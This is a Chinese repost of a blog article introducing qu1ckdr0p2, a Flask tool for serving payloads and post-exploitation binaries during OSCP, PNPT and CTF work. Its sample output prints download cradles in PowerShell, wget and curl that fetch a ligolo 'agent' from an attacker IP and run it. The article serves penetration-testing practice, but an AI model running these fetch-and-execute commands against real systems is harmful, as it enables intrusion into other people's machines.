通过 HTTP 或 HTTPS 快速托管有效负载和利用后 bin。
设计用于 OSCP / PNPT 或 CTF HTB / 等考试。
欢迎请求请求和问题。任何贡献也是如此。
Qu1ckdr0p2 带有别名和搜索功能。这些工具位于qu1ckdr0p2-tools存储库中。默认情况下,使用该选项时它会生成一个自签名证书来使用,当网络服务器运行时--https也会优先考虑该接口,否则它将使用.tun0eth0
common.ini定义选项使用的映射别名--search and -u。
当网络服务器运行时,屏幕上会打印几个下载支架以供复制和粘贴。
安装方式:
pip3 install qu1ckdr0p2echo "alias serv='~/.local/bin/serv'" >> ~/.zshrcsource ~/.zshrcorecho "alias serv='~/.local/bin/serv'" >> ~/.bashrcsource ~/.bashrcserv init --update
使用方式
提供位于当前工作目录中的单个文件serv serve -f implant.bin --https 443serv serve -f file.example --http 8080
从映射的别名提供文件服务
该-u选项的映射别名编号是动态的,因此您不必记住特定编号或键入工具名称。
$ serv serve --search ligolo[] Path: ~/.qu1ckdr0p2/windows/agent.exe[] Alias: ligolo_agent_win[] Use: 1[] Path: ~/.qu1ckdr0p2/windows/proxy.exe[] Alias: ligolo_proxy_win[] Use: 2[] Path: ~/.qu1ckdr0p2/linux/agent[] Alias: ligolo_agent_linux[] Use: 3[] Path: ~/.qu1ckdr0p2/linux/proxy[] Alias: ligolo_proxy_linux[] Use: 4(...)
$ serv serve --search ligolo -u 3 --http 80[→] Serving: ../../.qu1ckdr0p2/linux/agent[→] Protocol: http[→] IP address: 192.168.1.5[→] Port: 80[→] Interface: eth0[→] CTRL+C to quit[→] URL: http://192.168.1.5:80/agent[↓] csharp:$webclient = New-Object System.Net.WebClient; $webclient.DownloadFile('http://192.168.1.5:80/agent', 'c:windowstempagent'); Start-Process 'c:windowstempagent'[↓] wget:wget http://192.168.1.5:80/agent -O /tmp/agent && chmod +x /tmp/agent && /tmp/agent[↓] curl:curl http://192.168.1.5:80/agent -o /tmp/agent && chmod +x /tmp/agent && /tmp/agent[↓] powershell:Invoke-WebRequest -Uri http://192.168.1.5:80/agent -OutFile c:windowstempagent; Start-Process c:windowstempagent⠧ Web server running
项目地址:
https://github.com/byinarie/qu1ckdr0p2
原文始发于微信公众号(可汗安全团队):敏感信息收集 - 使用 Flask 通过 http 或 https 快速提供文件
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论